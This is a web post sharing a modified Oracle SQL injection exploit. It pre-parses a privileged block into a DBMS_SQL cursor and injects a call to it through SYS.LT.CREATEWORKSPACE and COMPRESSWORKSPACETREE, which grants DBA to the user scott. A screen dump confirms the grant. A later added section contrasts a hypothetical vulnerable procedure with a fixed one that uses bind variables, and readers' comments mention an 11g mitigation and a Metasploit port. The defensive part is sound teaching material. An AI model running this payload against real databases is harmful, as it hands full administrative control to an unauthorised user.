This is a slightly modified version of http://milw0rm.com/exploits/7677. It is based on cursor injection, so unlike the original you do not need CREATE PROCEDURE (create function) privileges: the privileged statement is parsed into a DBMS_SQL cursor in advance, and the string injected into SYS.LT.CREATEWORKSPACE and SYS.LT.COMPRESSWORKSPACETREE only calls DBMS_SQL.EXECUTE on that cursor handle. The ORA-01403 that SYS.LT raises afterwards is expected; the GRANT DBA has already gone through by then, as the second query of USER_ROLE_PRIVS in the screen dump shows.
------
DECLARE
  D NUMBER;
BEGIN
  -- Parse the privileged block into a DBMS_SQL cursor first; the autonomous
  -- transaction is what allows DDL and COMMIT from inside a query later on.
  D := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  -- Inject only dbms_sql.execute(<handle>) into the SYS.LT dynamic SQL; the
  -- trailing -- comments out whatever SYS.LT appends after the parameter.
  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;
/
#-----------screen dump-----------------------------------------------#
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
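As an added example, not code from the post and not the source of Oracle's SYS.LT package (which the post does not show), here is the pattern the injection above depends on in a hypothetical definer-rights procedure, beside a fixed version, followed by the same cursor-injection payload run against both. WS_LOOKUP_VULN, WS_LOOKUP_FIXED, DEMO_WORKSPACES and DEMO_MARKER are made-up names; the parsed payload only inserts a marker row instead of GRANT DBA, and it uses OR rather than AND so the single demo row cannot short-circuit past the function call. It assumes SQL*Plus and an ordinary user holding CREATE TABLE and CREATE PROCEDURE.

```sql
-- Added example, not code from the original post or from SYS.LT.
-- Constructed setup: one workspace row, and an empty table the payload writes to.
CREATE TABLE demo_workspaces (name VARCHAR2(30));
CREATE TABLE demo_marker (note VARCHAR2(30));
INSERT INTO demo_workspaces VALUES ('LIVE');
COMMIT;

-- Hypothetical vulnerable procedure: definer rights, and the caller's string is
-- concatenated straight into dynamic SQL, which is all the payload above needs.
CREATE OR REPLACE PROCEDURE ws_lookup_vuln (p_name IN VARCHAR2)
AUTHID DEFINER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'select count(*) from demo_workspaces where name = ''' || p_name || ''''
    INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE('vuln: matched ' || l_cnt || ' workspace(s)');
END;
/

-- Fixed version: the value travels as a bind variable, so quotes, OR/AND and --
-- inside it are data, never SQL.  AUTHID CURRENT_USER is the second layer: if an
-- injection were still found, the dynamic SQL would run with the caller's own
-- privileges, so a GRANT DBA issued by a low-privileged caller would fail.
CREATE OR REPLACE PROCEDURE ws_lookup_fixed (p_name IN VARCHAR2)
AUTHID CURRENT_USER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'select count(*) from demo_workspaces where name = :1'
    INTO l_cnt USING p_name;
  DBMS_OUTPUT.PUT_LINE('fixed: matched ' || l_cnt || ' workspace(s)');
END;
/

SET SERVEROUTPUT ON
-- Cursor injection, same shape as the exploit above: parse the privileged block
-- first, then inject nothing but dbms_sql.execute(<handle>) into the query.
-- The autonomous transaction is what lets DML and COMMIT run from inside a query.
DECLARE
  d       NUMBER;
  payload VARCHAR2(200);
BEGIN
  d := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(d,
    q'[declare pragma autonomous_transaction;
       begin execute immediate 'insert into demo_marker values (''INJECTED'')'; commit; end;]',
    DBMS_SQL.NATIVE);
  -- OR instead of AND: with one row named LIVE, name = 'a' is false, so the
  -- second operand must be evaluated and the cursor is executed.
  payload := 'a'' or dbms_sql.execute(' || d || ')=1--';

  ws_lookup_vuln(payload);   -- becomes: ... where name = 'a' or dbms_sql.execute(N)=1--'
  ws_lookup_fixed(payload);  -- whole payload compared as one literal: no match, nothing runs
  DBMS_SQL.CLOSE_CURSOR(d);
END;
/

-- The marker row proves the pre-parsed cursor ran through the vulnerable procedure.
SELECT note FROM demo_marker;

-- The check to run (as a DBA) after any incident like the one above: who holds DBA now.
SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA';
```

The bind variable is the actual fix; changing AUTHID alone only limits what a successful injection can do, which is why both are shown. The same reasoning applies to the real SYS.LT case: a SYS-owned definer-rights package that concatenates its argument into dynamic SQL hands out SYS's privileges to anyone who can call it.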
--
Comments
Nice one. Of course, it does not work with 11g because dbms_sql now checks before executing that the privileges did not change from the parse stage.
Slavik
Ported to MSF for the DEFCON release!
Is the regular create-procedure version of this working on 11 for you?